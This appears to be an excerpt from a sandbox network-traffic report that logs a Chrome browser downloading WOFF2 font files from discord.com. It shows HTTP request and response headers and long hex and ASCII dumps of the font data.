                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC416INData Raw: 77 4f 46 32 00 01 00 00 00 00 9b 2c 00 11 00 00 00 01 7c 50 00 00 9a c6 00 02 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 04 1b 81 9a 02 1c a0 20 06 60 00 8e 50 08 82 40 09 8d 57 11 0c 0a 83 a6 04 82 e9 3c 01 36 02 24 03 99 60 0b 8c 72 00 04 20 05 93 3c 07 b4 46 0c 83 60 5b 70 56 71 85 9a 77 ff 53 49 86 ba 2b 9e 53 7f 66 3b 64 53 c3 b6 69 f1 b3 9e ab 20 43 d4 b7 62 6a d8 36 8d 88 77 3b 80 2f d5 fe e1 b2 ff ff ff 4f 4d 26 cf b8 bf 5b b9 6d 6f 2d a1 c0 c7 87 0c 8f 88 34 46 60 04 0f 84 53 65 52 f8 58 7a 50 ae 67 0f ac 6a 0a b9 4c f5 96 a2 0b a2 53 18 54 28 61 c5 15 79 a3 44 90 d3 06 6f 64 bb 2f 29 e3 02 f7 d8 e1 7c 6c f7 1d 0f 7a 6e f4 d2 91 ef a0 54 d0 e2 bc 92 4f 70 5a 50 08 bc b0 b3 63 5c 8c f2 c3 da 25 92 48 96 cb ba 79 04 09
                                                                                                                                                                                                                                                                                    Data Ascii: wOF2,|PB `P@W<6$`r <F`[pVqwSI+Sf;dSi Cbj6w;/OM&[mo-4F`SeRXzPgjLST(ayDod/)|lznTOpZPc\%Hy
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 8b 23 ae 7e 5f a8 88 df fc ff ea 9a 85 13 21 d7 85 e4 99 f9 37 13 65 7f 9e e6 f4 fd ff cf 73 b9 5c 84 60 47 d0 5e b3 15 af 68 d2 42 b2 04 93 09 74 52 a3 4e d5 c0 2b 22 78 55 81 0e e6 ca a8 33 aa 46 7d 30 f8 ff df cd 7a f7 bd 90 40 5e 92 06 69 42 5e 0a 13 b4 0e 75 26 1d ab 0f 9d b3 5f 7b 98 24 5d 0e ab 8c 88 af 98 fe b9 7f 8a 38 6b c6 9a 8c 18 fc 3f ff 63 cf ff e6 5e e7 7e 15 a0 fd 41 32 cd d6 18 54 95 24 16 69 10 09 9d fa 13 59 63 78 21 62 7e 06 78 bb fd bb 33 3a 67 ee 5b ce ba 21 c9 58 95 ce b8 b3 66 67 74 ec 64 75 66 12 92 cc fb 92 75 5a 57 21 d9 19 97 8c 79 f9 c6 aa 28 5d d6 8f 24 d9 49 66 5f fc 9f cd f6 67 36 39 b7 45 66 de 27 7b e2 98 6e 64 43 0e d3 59 74 36 f1 ee 2a c4 3b ee 0d 5c 05 15 4d f5 17 0d dd 15 0d 45 27 da 5e 49 cb dc fb ce 72 46 4a ae ed
                                                                                                                                                                                                                                                                                    Data Ascii: #~_!7es\`G^hBtRN+"xU3F}0z@^iB^u&_{$]8k?c^~A2T$iYcx!b~x3:g[!XfgtdufuZW!y(]$If_g69Ef'{ndCYt6*;\ME'^IrFJ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 8d a5 65 b0 b6 1c 36 54 c0 e6 1e 79 3b 43 20 cb 04 b2 5a 87 3d 95 73 a0 1a 8e f6 8a da 9a a9 af 8d 86 3a bd cf 11 c8 ef 05 f2 27 1d 7e ed 1d 7f 34 ce df 7d e4 72 73 5c ed 3b 77 5a e3 61 db 3c 6f d7 7b 85 00 df e8 d0 de 91 d2 d9 b1 5a 40 16 90 88 84 5c 42 18 4a 14 73 49 e0 55 52 28 25 87 a5 60 04 15 9e a8 d2 f0 fa f2 67 86 80 00 16 e8 85 05 72 f6 b9 56 4e 20 ce 51 f7 8e 08 01 41 72 6f 1c 15 06 8a 42 88 3d 16 74 86 1b 49 c8 1c 58 94 a2 16 6d 42 6e eb 1f 11 06 4a 04 e3 47 65 dc a0 b4 6a 70 e8 88 f3 4e f4 0d e0 73 d0 99 e7 39 20 80 f3 28 80 70 31 94 5a 4a d7 ea b7 30 a5 7b a5 47 a5 b6 cd 2f c1 70 10 fe 6b 64 31 d7 2b 39 37 bf e2 34 ef 34 ce 5a d3 c9 38 50 94 47 07 fe 33 ae 63 8a 00 41 1c 67 38 09 b1 b3 1c 04 71 d1 45 37 c1 5d 62 6b 25 ba 57 da 5a 4f 4d ae 96
                                                                                                                                                                                                                                                                                    Data Ascii: e6Ty;C Z=s:'~4}rs\;wZa<o{Z@\BJsIUR(%`grVN QAroB=tIXmBnJGejpNs9 (p1ZJ0{G/pkd1+9744Z8PG3cAg8qE7]bk%WZOM
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 49 a2 dc c9 12 52 a2 73 ea 97 fa a7 eb 09 fa 76 e7 b0 16 9e 3a 0e 2a 65 1e fb 8d 19 d1 6c 32 42 8b d3 e1 1c d3 5e ae 46 2a d2 7d d6 ec 4b e7 4b 32 87 13 da 24 9d 1c b1 c2 8c 5e 99 8e 9c b7 15 7c d5 af a7 38 79 45 a6 9c fe cc a6 74 13 a2 e2 65 5e 1d f9 5b 8a 78 70 6e 30 e9 6f cd 9f 9a 03 29 4c 7d 5c 11 b8 51 fa 2a 8d 1f 10 92 de 6c 0d 25 73 1d 39 7d 5b 60 83 c1 eb 8d aa 91 7e 64 4e 5e da ab c6 70 56 54 5a 8f a6 eb 67 e3 90 d4 ea 37 56 83 f6 7f 5e 76 82 9d b3 ef 3d 1d 46 57 96 ec 48 e5 e5 fa b2 7a f7 04 bf 1b 83 73 98 4e 1f 8d 9a 0a 34 bb 3d 35 d4 b0 dd 12 fc e1 a1 13 94 8a 9f ee ca ab c6 5e 5d 6f c3 ac 00 3c b0 6a 03 76 93 c9 d8 ca 1a 59 28 56 3a 54 82 e0 d2 51 ee ac c0 5f 81 7b 83 50 b0 86 61 0a c8 3b da 21 dd 31 bf ab f3 31 0d dd 4a 9d c1 28 81 06 d3 70
                                                                                                                                                                                                                                                                                    Data Ascii: IRsv:*el2B^F*}KK2$^|8yEte^[xpn0o)L}\Q*l%s9}[`~dN^pVTZg7V^v=FWHzsN4=5^]o<jvY(V:TQ_{Pa;!11J(p
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 90 f3 48 43 24 c1 da 40 e7 10 bf 6c 22 40 43 a6 05 56 6d 51 97 cc 42 6a 42 53 d9 c9 ba e5 a0 3f b1 ac 4d ed a0 97 8d c0 b0 18 53 2e 04 69 5f ee 04 5f 42 04 29 85 8c 58 1c 2b fe 53 7d 40 0b 25 b6 98 6d 30 0c 6f 8a 42 dc 12 56 ec c0 04 d9 29 a2 ec e9 a7 20 51 15 53 2b e2 9b 11 60 93 31 ad 17 8e c5 a4 6d 4d 24 26 67 c3 8c 44 22 68 c8 d9 dd c6 30 a4 3a 12 ed c2 12 7e 24 14 55 cb 6a 8c 9f 29 63 4b 8f e6 15 c4 58 a6 f6 58 a9 7c df 77 ec e1 20 3b 02 b8 9d d1 af 74 4d 06 66 fb 54 b6 bb f0 3c dc 44 6a 91 34 ad 7e c9 4c 46 20 cc 14 2d c8 0a 0e 6c 97 70 c1 34 e6 f7 cd 62 1e 1f f0 29 0f 16 1f df 45 90 12 15 49 36 8d 6c 5f 4e cc e8 91 15 1f 15 fc e1 8f 50 c9 90 52 5c d3 0e 63 14 e3 4e ad 14 d3 44 45 49 5f 21 d6 21 8a 51 bc 92 95 b1 8d 5b bf a5 6c 15 88 47 45 95 32 61
                                                                                                                                                                                                                                                                                    Data Ascii: HC$@l"@CVmQBjBS?MS.i__B)X+S}@%m0oBV) QS+`1mM$&gD"h0:~$Uj)cKXX|w ;tMfT<Dj4~LF -lp4b)EI6l_NPR\cNDEI_!!Q[lGE2a
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 3d 05 59 08 41 c0 bd d2 8c b9 7e a8 81 96 7f 68 8a ea 8b aa 01 9d e2 e9 be c4 3d 04 6e 6e b9 94 06 d2 98 49 d7 5a ea 3c 9d 27 13 b2 48 ec 2c 3d 66 92 8f 08 ec f4 44 61 22 2a ab a4 b4 71 09 69 c8 42 1e aa e8 69 71 e9 b0 07 35 d4 a3 03 4d 18 b4 ef ca a2 9e 5d de 6a 1d 37 5a ee 84 88 53 13 73 6b 1d 03 4d d3 7c 7e a9 09 4e 6b 3c 3a 82 b6 e5 81 69 45 64 80 a6 10 52 99 9d 18 a5 47 00 24 3e 0d b9 1a a3 04 35 ab 22 42 f3 3a 6f ef 1d 21 5e 41 df 1a 95 b3 08 a2 f9 b6 60 72 17 66 a5 e2 c9 aa ea 30 32 26 4b b3 be a5 24 e1 e7 74 9b 2a 70 9e e5 20 c6 57 1d c9 c8 20 53 26 54 62 b2 fe d0 17 93 0a 8f 6c 81 14 67 f4 67 d7 44 d1 7e 69 05 76 3a 60 81 07 82 61 51 36 17 5d a5 81 6a 88 99 b4 58 7a 8c ca f5 4e c7 c9 09 27 a6 03 e8 2c 8d d8 5e 30 db d1 5b 34 16 22 66 1d 2c 67 d8
                                                                                                                                                                                                                                                                                    Data Ascii: =YA~h=nnIZ<'H,=fDa"*qiBiq5M]j7ZSskM|~Nk<:iEdRG$>5"B:o!^A`rf02&K$t*p W S&TblggD~iv:`aQ6]jXzN',^0[4"f,g
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 80 73 e4 77 87 b5 b8 f2 a3 fb 09 52 4e ee 7a cb b2 f6 f5 0d 87 7e 66 49 1c c2 e3 39 4c 1e c2 e4 12 10 4b 36 fe 3b 29 f0 50 8f 71 39 04 50 22 87 7a 8e 56 66 46 a6 ba 7b c1 86 7a 79 1a 6b 8a 6a 23 4a 63 06 b5 62 42 2e 27 ba d3 53 b2 47 16 e5 33 53 1e c2 cb 50 2e 75 f0 a4 a6 2a 3c 6a ce c1 53 1b 54 74 4a ee 81 ea 80 2a 71 d0 e2 c5 53 3a 94 c4 a9 5b 58 72 f7 ca 1e fb c8 2c 99 e3 30 5d d3 55 69 12 d3 ee 94 1e 98 6a 28 c0 5a 9b 08 1c 2e e6 ac a9 d6 13 ca 89 4b 66 0d 80 9a 74 d1 f0 94 27 14 8f 05 aa 8a 90 78 3d 32 c7 aa 57 26 bc 6a be 80 52 e5 23 9a b6 12 de 00 16 c8 66 f9 e4 0d c0 ee 76 13 1c 14 2c 1d 7f 05 3c b5 35 4d 87 cb 69 5a ac 32 0f d2 7d 81 19 65 2a 1b 0d aa b5 12 b4 9c 78 85 ea 3e 6e 5c 73 e8 54 9d ef e0 ce 59 76 6d 11 54 9e 87 76 0c 55 b0 09 c5 fb 27
                                                                                                                                                                                                                                                                                    Data Ascii: swRNz~fI9LK6;)Pq9P"zVfF{zykj#JcbB.'SG3SP.u*<jSTtJ*qS:[Xr,0]Uij(Z.Kft'x=2W&jR#fv,<5MiZ2}e*x>n\sTYvmTvU'
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: d9 09 dc 18 7c 46 e9 46 c1 48 64 57 d8 eb 83 b1 38 a5 85 ed e9 a2 59 e0 33 4c 37 4e 2a 93 6a ab 1b 42 fd 9b 68 3d ea 2e 77 24 57 c8 a7 9c 6e 9c cc 91 e9 1c 8d 9d 03 53 8c 11 f7 37 12 cd 03 9f 83 ba 71 0a b7 52 ef 6c 0a 0f 4e b3 66 32 dc 3d b1 02 f0 49 a9 1b a7 f2 e4 06 57 73 64 68 33 67 a5 e3 c3 1b 17 c0 67 a9 6e bc 84 af 30 ba 5b 36 0e cf f0 76 36 3d 7d 89 3f e0 d3 56 37 5e 2a 50 56 79 fc 5d 23 09 c1 c9 e7 97 3f 69 00 9f c7 ba 71 9a 50 65 f2 b6 76 8f 6e 11 dd 62 79 07 52 ff c0 27 b6 7e 6b a1 8b d4 66 5f 5b 0f d5 ad c0 4a 5b d5 38 a6 c1 0f 9a b4 7a 00 15 05 1e ee 45 ab b0 92 6a 6b ab bf 0f 7d 69 b5 44 dd a4 e8 63 80 41 86 19 61 8c 71 a6 c0 de e3 61 51 c5 95 f4 b9 c9 a6 9a 6e e6 ed 8b b5 f3 a1 78 a9 1f 2d c3 99 75 2f c1 5a db 6b 97 68 2f e8 a3 aa 4e 61 b7
                                                                                                                                                                                                                                                                                    Data Ascii: |FFHdW8Y3L7N*jBh=.w$WnS7qRlNf2=IWsdh3ggn0[6v6=}?V7^*PVy]#?iqPevnbyR'~kf_[J[8zEjk}iDcAaqaQnx-u/Zkh/Na
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 97 54 4f 42 7e 26 80 ae 76 46 6f 35 e5 45 a7 d7 94 9b 92 aa 65 a2 66 cc 47 a3 44 5b de e8 d2 e3 63 a2 71 f2 4a 25 9c 64 d2 c1 3b 9b 72 98 d4 33 cf 38 d3 cc 52 88 52 50 5e f9 14 5d e0 38 8a 2a a7 2d 6d 6b 7b 4f 14 73 b1 b7 75 f5 4e 1f 1a 69 bc 8f 4d b5 d1 d7 16 5b c5 d1 df 4e 00 09 59 44 08 28 2c f8 3d e6 19 91 58 b0 e4 43 4b 73 e2 bd 8f ab 3b 48 63 c9 f7 39 44 d3 21 9b 09 d6 64 e8 be a4 d8 5c 5a fd 4c a5 85 ce b4 96 76 5b a9 f6 2d 83 76 d3 6f a7 73 ed 67 d8 5e 46 fd e9 42 87 59 83 64 89 3b 93 8e b3 72 2a 62 47 11 70 65 8b 37 7b fc 2e 47 42 39 13 c9 89 70 2e 44 bb 44 2c 37 92 79 90 ce 9d 54 97 c9 14 49 3d 6f b0 22 9c 2e c6 d9 6e d2 2d 81 7e f1 f4 ba c5 b0 64 17 ba ed 7c 49 ce 95 c1 b4 74 26 a5 31 8e c1 b5 87 5c ca 62 de 63 e4 1e 70 ee 91 4b 15 b9 5c 19 df
                                                                                                                                                                                                                                                                                    Data Ascii: TOB~&vFo5EefGD[cqJ%d;r38RRP^]8*-mk{OsuNiM[NYD(,=XCKs;Hc9D!d\ZLv[-vosg^FBYd;r*bGpe7{.GB9p.DD,7yTI=o".n-~d|It&1\bcpK\
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 6b e9 13 79 13 35 ed b3 dc c4 be 6f 56 03 5d 3f 28 c3 c1 95 32 f7 5f 54 87 5d d5 86 2e a8 c7 ee 03 bb 70 00 4e b2 93 97 32 cb 8d 8b 39 74 31 b2 b5 97 c6 3e 5b 7b f9 35 f5 b9 0f e0 b4 76 49 c5 9c 65 c2 89 9f 1f ab e3 c9 95 2e 13 88 72 c7 94 3c 0a eb 46 87 e3 7a 10 46 88 a7 6c 19 23 86 47 81 b8 3e 4a cc 78 4b 17 59 ac 64 a8 13 33 69 9e 63 4d c7 3c 44 5a 19 f6 8e b0 a6 3c e7 45 d5 b4 1b ce 7e b4 70 3f 38 3d d0 ad 4f c1 11 24 52 66 99 62 da 31 9c a2 a6 dd b8 a8 2a 6e 32 9c 30 46 0b b3 05 59 06 42 e7 77 af 0e 03 20 30 3c 42 3f f1 0a 00 75 3c 00 e3 3b 01 ee 0b ec f9 1c 82 83 5f 04 c0 c6 1f 20 58 75 2f e0 c4 d3 01 0c 00 f6 73 af c0 df e7 1d 90 d3 c1 2a f9 c8 ac d6 70 bb 5b 29 80 eb 48 b8 e2 55 f3 92 90 5a 84 5a 94 3d c9 c3 ce d7 e8 42 4e d3 d7 a8 1a fc db 4a 16
                                                                                                                                                                                                                                                                                    Data Ascii: ky5oV]?(2_T].pN29t1>[{5vIe.r<FzFl#G>JxKYd3icM<DZ<E~p?8=O$Rfb1*n20FYBw 0<B?u<;_ Xu/s*p[)HUZZ=BNJ


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    39192.168.2.549762162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:37 UTC909OUTGET /assets/8bd8143eff37936894aa.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.css
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC955INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                                                                                    Content-Length: 45868
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0b11ece5e68-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "d295c40af6fca08f8e0eb5425351f431"
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 05 Jun 2024 19:27:55 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xrcMmsr1xA%2Flx9Daa5QMNw4rHoHEB7TqrEG8IcpTEsQc5%2FQmPufHIPGNZf8pGdaEiu7tbDqpzc9Yf3GfJAQhBuPvlvbuL9unvVll5NROVbeeOvxWgoXulFhmijIr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC414INData Raw: 77 4f 46 32 00 01 00 00 00 00 b3 2c 00 11 00 00 00 01 a8 94 00 00 b2 c8 00 03 00 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 82 78 1b 81 cf 10 1c a1 5c 06 60 00 8e 58 08 82 40 09 9f 03 11 0c 0a 83 b3 54 82 f8 40 01 36 02 24 03 9a 0c 0b 8d 08 00 04 20 05 94 61 07 b5 4b 0c 83 78 5b 54 83 91 01 35 c7 ee 7f 28 a0 da 56 d9 4d aa fa 6d e0 04 d4 87 7b 81 39 86 a0 d3 ea b7 73 34 39 92 f8 79 62 6a d8 ee 1e 80 da 09 89 3e 7d db 6d cb b2 ff ff ff ff cf 4f 26 72 d8 25 e6 92 54 8b 81 51 ec 7f ff 03 35 c2 34 33 b8 79 44 ea d8 75 99 25 12 53 df 77 5e 90 42 f6 2e c2 bb ce 82 2a 31 70 7c 62 32 c4 bc 88 67 87 d4 9c cd 57 75 71 cd b7 42 1b 16 c3 32 a6 65 7e 09 33 0a 12 3e 11 49 c9 a6 8e 54 4c 50 db f5 63 aa 83 f9 8e b9 63 24 38 fc e9 54 6c 65 c5 09 17
                                                                                                                                                                                                                                                                                    Data Ascii: wOF2,x\`X@T@6$ aKx[T5(VMm{9s49ybj>}mO&r%TQ543yDu%Sw^B.*1p|b2gWuqB2e~3>ITLPcc$8Tle
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 03 4b f3 cf b3 35 df 1a 36 8b 8b c2 14 7e d9 90 72 a2 66 04 f1 35 44 d3 be 88 55 7c 57 e1 24 a8 93 da 6e a6 66 c2 28 36 9c ee 6a bf 7c ba 82 ab e6 42 8a 9f d3 5d cc 1e 2d aa ba d7 d4 5d 22 8b de a5 35 c8 ea 5b 67 1b 42 bd eb 5b 73 b6 e5 25 20 8e 5b 2f a0 44 b4 a9 6d 89 ed b8 e2 89 2f 14 fc ff 55 7d 64 e4 ed aa 01 b4 54 cf 3c 80 f8 b2 bd 62 9d 9f e7 b7 f9 e7 dc 7c 8f 07 46 63 01 e6 86 4b 97 c6 32 59 94 ae 70 62 7d 6d 5c a4 cb 70 9d 81 8b fc d5 3a 07 68 6e dd 36 24 2a 46 8f 14 46 d4 c8 8d 31 22 45 2a 0d 68 2b a8 12 89 12 e9 12 26 35 72 a0 8c 28 83 96 a8 7c 7c 67 d1 9a 4e 5c 54 11 ae b3 fb c4 49 99 34 4b 44 5b 55 d6 80 5e 56 19 e4 79 be 7b f3 6e 25 6a 33 7f 6b b3 e5 15 2e 89 45 25 c0 01 8e 40 a3 08 e5 3c 28 6a bf 7f fc ee de 13 2e 4f e0 0c 82 8a 4b f9 f8 b0
                                                                                                                                                                                                                                                                                    Data Ascii: K56~rf5DU|W$nf(6j|B]-]"5[gB[s% [/Dm/U}dT<b|FcK2Ypb}m\p:hn6$*FF1"E*h+&5r(||gN\TI4KD[U^Vy{n%j3k.E%@<(j.OK
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 2a 82 9b ae 65 4d b4 0a c9 70 1f d2 65 7f 1a 96 61 30 7e 21 84 11 4d 61 8a a6 68 7a f3 3c 7c ce c4 2f 6f e6 b0 dc 7d d0 a1 88 22 8c 08 26 98 12 4a 59 c2 d7 ac a6 f2 5e 74 13 02 28 4d cb af a0 e5 12 94 9b 11 7a c5 55 f5 97 21 88 c8 22 61 58 c2 f1 cb 52 b1 48 20 08 f1 86 60 e2 81 cd 76 db 7b fc 6f 92 e9 3a 96 8a ee d6 ba 18 2b 1b 02 09 49 80 40 29 7d 5e e7 fd 39 ff a1 02 de d6 da bb a6 56 14 44 46 48 42 c6 86 84 71 de df f3 f9 bd d3 3f 37 e9 1b 35 9e 18 95 a4 16 a9 85 a4 2a db 3e 7e e0 c2 1a 96 00 ac e1 cd 3f 65 2c 89 30 fa 43 06 1a 02 19 66 22 64 b2 97 20 af c3 09 86 3b 77 c1 c8 47 1e 8c 42 b4 c1 e8 fa 12 cc 2b df 43 72 93 1b 30 44 50 25 10 99 64 02 45 78 1f aa 67 3e 50 7d f3 05 f5 2f 10 f4 59 2f 40 5f f7 1e 34 b8 50 d0 f0 a2 41 63 8b 05 4d 2e 19 34 ad 74
                                                                                                                                                                                                                                                                                    Data Ascii: *eMpea0~!Mahz<|/o}"&JY^t(MzU!"aXRH `v{o:+I@)}^9VDFHBq?75*>~?e,0Cf"d ;wGB+Cr0DP%dExg>P}/Y/@_4PAcM.4t
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: fd 12 79 8d 50 59 64 12 11 47 81 af 64 71 e9 e1 50 06 7c 69 b5 87 90 c9 99 72 9d 32 5e 84 b5 d0 29 57 34 b4 a5 7c 8d 08 b3 e2 11 3b 5a ba b3 3c b2 01 e4 17 58 e5 96 b0 d9 a5 ca 9d 4a 2b b8 e3 c2 f9 09 f6 8b a2 55 51 6d b7 74 ad de 36 49 6e de 62 18 60 53 0b 2e 42 2f a2 1e 39 d2 ac b5 bf e3 fa fe 1e e1 95 e0 6d 2c 09 e7 9f 35 52 bb 00 d0 6a 34 2b fb ec e0 44 6c 76 6d c3 28 89 ca f0 11 c3 58 63 37 43 5a f6 27 38 b4 a1 db 91 fb cd 10 69 cb b0 ae 58 13 7a dd 54 c6 c9 76 a2 58 f4 5b 1b c8 c3 e3 03 fe 53 77 a1 be 09 ab 03 11 8e e3 4a 9b e7 2e 70 42 89 cc 0f fb f1 28 75 a5 7e d6 6f 84 0f 22 f3 ca cf 20 32 98 3e 3e f4 82 d2 b2 c3 f7 d8 d1 bb ac 18 c3 24 02 e2 e7 80 88 8e 16 01 75 68 f4 5a e7 70 cc 28 ab 5e 1e 7f 03 99 62 59 86 f6 1c b7 1e 2c 0d 7e 81 49 e1 1e 48
                                                                                                                                                                                                                                                                                    Data Ascii: yPYdGdqP|ir2^)W4|;Z<XJ+UQmt6Inb`S.B/9m,5Rj4+Dlvm(Xc7CZ'8iXzTvX[SwJ.pB(u~o" 2>>$uhZp(^bY,~IH
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: e3 d5 01 81 e7 26 44 b0 f7 4b f9 7e 14 c4 c1 45 ef 04 5f 05 df d0 db d2 db 05 44 68 9e 45 96 59 65 dd 7d 08 44 84 28 c0 eb 66 8a 8a 72 f0 ec ea 85 bd d4 9d c1 d7 c0 37 f5 b6 f5 1a 10 e8 2b de 57 8d 4d e0 0b 03 87 c2 10 fb 0e 5e 0c 38 d4 1b 57 14 d7 8d 70 3a d6 4c ef 10 9e 0b 8d 60 79 c7 7e 1b 12 a7 df 02 68 e9 2b 36 f6 61 ba 76 5b 06 f1 14 4c e8 1c 31 b8 13 f1 47 fc 87 a3 43 73 fb 36 ac f8 e8 12 62 1b af 5a 27 f1 b2 f1 69 72 66 66 7e 96 66 75 36 66 7b f6 e6 70 4e fa 66 e7 73 20 c7 72 22 e7 72 19 7a d5 eb d4 f4 3c 3f 27 ce 95 7c ae 36 a8 92 6c 5a 08 3c 2b 14 5e 58 a2 04 48 ba e0 41 1a 50 60 4f 2a ad 13 6a 09 5e 36 a1 89 0f 04 0b 2c 87 58 01 0c 77 21 a8 2f 54 15 20 92 45 91 28 71 1e 97 c3 54 8e 78 59 d8 57 50 25 10 43 aa ac b1 d6 3a bf 58 6f 83 58 bf da e5
                                                                                                                                                                                                                                                                                    Data Ascii: &DK~E_DhEYe}D(fr7+WM^8Wp:L`y~h+6av[L1GCs6bZ'irff~fu6f{pNfs r"rz<?'|6lZ<+^XHAP`O*j^6,Xw!/T E(qTxYWP%C:XoX
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: f6 61 e7 63 20 3a 62 5b 6f e5 71 f1 ac 8a cb 7b 54 29 b4 5e 46 5b e2 3a 3e 58 93 56 f1 de f5 8d 72 a5 f0 6f 21 16 69 7e c0 e2 9f 12 72 d2 9c 56 35 b1 bd 96 6a d9 93 55 d5 73 2f 1b b0 fb 8c c2 0a 47 27 d2 db c4 02 e9 99 4d 83 8b 58 8e 85 6f 7b 69 ab 36 65 db 76 38 29 6d 2c 6b 0c f8 dd 76 ca 16 85 dc d5 f1 14 77 fa 6a aa d9 3d 36 21 59 4d 40 1d 7e af 35 5b e7 a1 d5 9a 59 2d 4d 2b 83 ea ad d4 24 4e e2 b3 4e f0 91 cb a4 f7 b1 f1 2c d0 91 2d b7 5f 69 d7 26 e1 9e 09 bf 9e 8e ae 34 a3 20 f9 48 cf 63 3f e6 e2 b4 c8 57 7a 76 b8 01 66 55 32 f3 88 c5 6a ae e3 0a 6e 34 a2 eb 52 aa b6 63 15 5c 4c c6 49 9e 3f 47 ec c2 70 95 f1 33 fd 3f 2b 0d 9f 81 60 8e 7a c2 b2 86 12 ff 56 b7 41 1c 1e cb cd 23 00 37 ae b6 1a 26 68 97 77 1f cb 08 6f 87 36 98 2f d7 39 7a aa 07 7f 3c 6a
                                                                                                                                                                                                                                                                                    Data Ascii: ac :b[oq{T)^F[:>XVro!i~rV5jUs/G'MXo{i6ev8)m,kvwj=6!YM@~5[Y-M+$NN,-_i&4 Hc?WzvfU2jn4Rc\LI?Gp3?+`zVA#7&hwo6/9z<j
